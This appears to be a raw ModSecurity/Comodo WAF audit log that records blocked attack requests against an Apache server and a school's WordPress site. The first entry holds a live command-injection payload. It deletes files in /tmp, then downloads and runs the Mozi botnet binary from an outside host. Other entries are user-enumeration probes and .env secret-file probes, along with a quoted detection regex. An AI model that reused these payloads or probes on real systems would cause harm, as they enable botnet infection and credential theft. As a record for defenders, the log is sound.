ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e199633e-Z-- --c199080c-A-- [20/May/2025:14:31:08 +0700] aCwvvPjdRvl4szSJA_aPGwAAAJU 103.236.140.4 34780 103.236.140.4 8181 --c199080c-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.86.238.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.86.238.208 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --c199080c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c199080c-E-- --c199080c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747726268450912 2404 (- - -) Stopwatch2: 1747726268450912 2404; combined=746, p1=462, p2=232, p3=0, p4=0, p5=52, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c199080c-Z-- --1138ef5c-A-- [20/May/2025:14:32:41 +0700] aCwwGfjdRvl4szSJA_aPZwAAAIs 103.236.140.4 35056 103.236.140.4 8181 --1138ef5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.105.218.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.105.218.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1138ef5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1138ef5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747726361138011 3293 (- - -) Stopwatch2: 1747726361138011 3293; combined=1383, p1=462, p2=892, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1138ef5c-Z-- --df6d4565-A-- [20/May/2025:14:44:53 +0700] aCwy9fjdRvl4szSJA_aRbgAAAIQ 103.236.140.4 40422 103.236.140.4 8181 --df6d4565-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.96.42.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.96.42.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df6d4565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df6d4565-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747727093647877 2627 (- - -) Stopwatch2: 1747727093647877 2627; combined=1411, p1=467, p2=913, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df6d4565-Z-- --6b914a41-A-- [20/May/2025:14:57:31 +0700] aCw168XP1sKBAOnOfYM4AwAAAM4 103.236.140.4 42660 103.236.140.4 8181 --6b914a41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.174.97.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.174.97.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b914a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b914a41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747727851539908 3244 (- - -) Stopwatch2: 1747727851539908 3244; combined=1416, p1=480, p2=905, p3=0, p4=0, p5=31, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b914a41-Z-- --b3aaf725-A-- [20/May/2025:15:17:42 +0700] aCw6pvjdRvl4szSJA_aaOQAAAJY 103.236.140.4 41520 103.236.140.4 8181 --b3aaf725-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b3aaf725-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3aaf725-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747729062146105 846 (- - -) Stopwatch2: 1747729062146105 846; combined=351, p1=313, p2=0, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3aaf725-Z-- --5a270143-A-- [20/May/2025:16:11:31 +0700] aCxHQ22BM6ll8T8hTXubigAAAEo 103.236.140.4 37562 103.236.140.4 8181 --5a270143-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.139.50.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.139.50.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5a270143-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a270143-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747732291340911 2882 (- - -) Stopwatch2: 1747732291340911 2882; combined=1204, p1=440, p2=732, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a270143-Z-- --a9345e1b-A-- [20/May/2025:16:36:58 +0700] aCxNOm2BM6ll8T8hTXudhAAAAEE 103.236.140.4 41844 103.236.140.4 8181 --a9345e1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.211.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.211.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9345e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9345e1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747733818098124 2872 (- - -) Stopwatch2: 1747733818098124 2872; combined=1268, p1=443, p2=793, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9345e1b-Z-- --3435e702-A-- [20/May/2025:17:04:27 +0700] aCxTq22BM6ll8T8hTXudrQAAAFI 103.236.140.4 41990 103.236.140.4 8181 --3435e702-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.196.217.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.217.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3435e702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3435e702-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747735467837541 3103 (- - -) Stopwatch2: 1747735467837541 3103; combined=1488, p1=479, p2=978, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3435e702-Z-- --a516e611-A-- [20/May/2025:17:26:05 +0700] aCxYvfjdRvl4szSJA_ajngAAAJg 103.236.140.4 42158 103.236.140.4 8181 --a516e611-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36 OPR/63.0.3368.17 (Edition beta) Accept-Charset: utf-8 --a516e611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a516e611-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747736765862549 891 (- - -) Stopwatch2: 1747736765862549 891; combined=342, p1=299, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a516e611-Z-- --da1fc87e-A-- [20/May/2025:18:09:54 +0700] aCxjAvjdRvl4szSJA_akwAAAAIY 103.236.140.4 46158 103.236.140.4 8181 --da1fc87e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.250.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.250.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da1fc87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da1fc87e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747739394710750 2872 (- - -) Stopwatch2: 1747739394710750 2872; combined=1284, p1=451, p2=802, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da1fc87e-Z-- --1ea4e95a-A-- [20/May/2025:18:14:44 +0700] aCxkJG2BM6ll8T8hTXugEAAAAEI 103.236.140.4 46198 103.236.140.4 8181 --1ea4e95a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 207.154.197.113 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ea4e95a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ea4e95a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747739684061860 851 (- - -) Stopwatch2: 1747739684061860 851; combined=361, p1=325, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ea4e95a-Z-- --f63f0370-A-- [20/May/2025:19:19:28 +0700] aCxzUPjdRvl4szSJA_ak4QAAAI0 103.236.140.4 46526 103.236.140.4 8181 --f63f0370-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.173.45.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.173.45.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f63f0370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f63f0370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747743568545624 2542 (- - -) Stopwatch2: 1747743568545624 2542; combined=1140, p1=387, p2=725, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f63f0370-Z-- --8c298861-A-- [20/May/2025:20:07:57 +0700] aCx-rW2BM6ll8T8hTXuhaAAAAEo 103.236.140.4 49324 103.236.140.4 8181 --8c298861-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 134.122.126.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 134.122.126.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8c298861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c298861-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747746477527774 3382 (- - -) Stopwatch2: 1747746477527774 3382; combined=1445, p1=458, p2=950, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c298861-Z-- --9b6b0777-A-- [20/May/2025:20:21:25 +0700] aCyB1YKffmi-VC_l8kRraAAAAAc 103.236.140.4 49738 103.236.140.4 8181 --9b6b0777-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.199.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.199.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9b6b0777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b6b0777-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747747285519825 3175 (- - -) Stopwatch2: 1747747285519825 3175; combined=1390, p1=451, p2=905, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b6b0777-Z-- --93276735-A-- [20/May/2025:21:32:08 +0700] aCySaMXP1sKBAOnOfYNWPAAAAMQ 103.236.140.4 53388 103.236.140.4 8181 --93276735-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --93276735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93276735-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747751528789813 3392 (- - -) Stopwatch2: 1747751528789813 3392; combined=1675, p1=547, p2=1101, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93276735-Z-- --f1b54514-A-- [20/May/2025:21:55:26 +0700] aCyX3sXP1sKBAOnOfYNcfQAAAMM 103.236.140.4 52604 103.236.140.4 8181 --f1b54514-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept-Charset: utf-8 --f1b54514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1b54514-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747752926024247 1811 (- - -) Stopwatch2: 1747752926024247 1811; combined=453, p1=412, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1b54514-Z-- --a74b6107-A-- [20/May/2025:22:10:40 +0700] aCybcIKffmi-VC_l8kR6rwAAABg 103.236.140.4 43494 103.236.140.4 8181 --a74b6107-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.101.239.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.101.239.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a74b6107-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a74b6107-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747753840184281 3069 (- - -) Stopwatch2: 1747753840184281 3069; combined=1325, p1=475, p2=821, p3=0, p4=0, p5=29, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
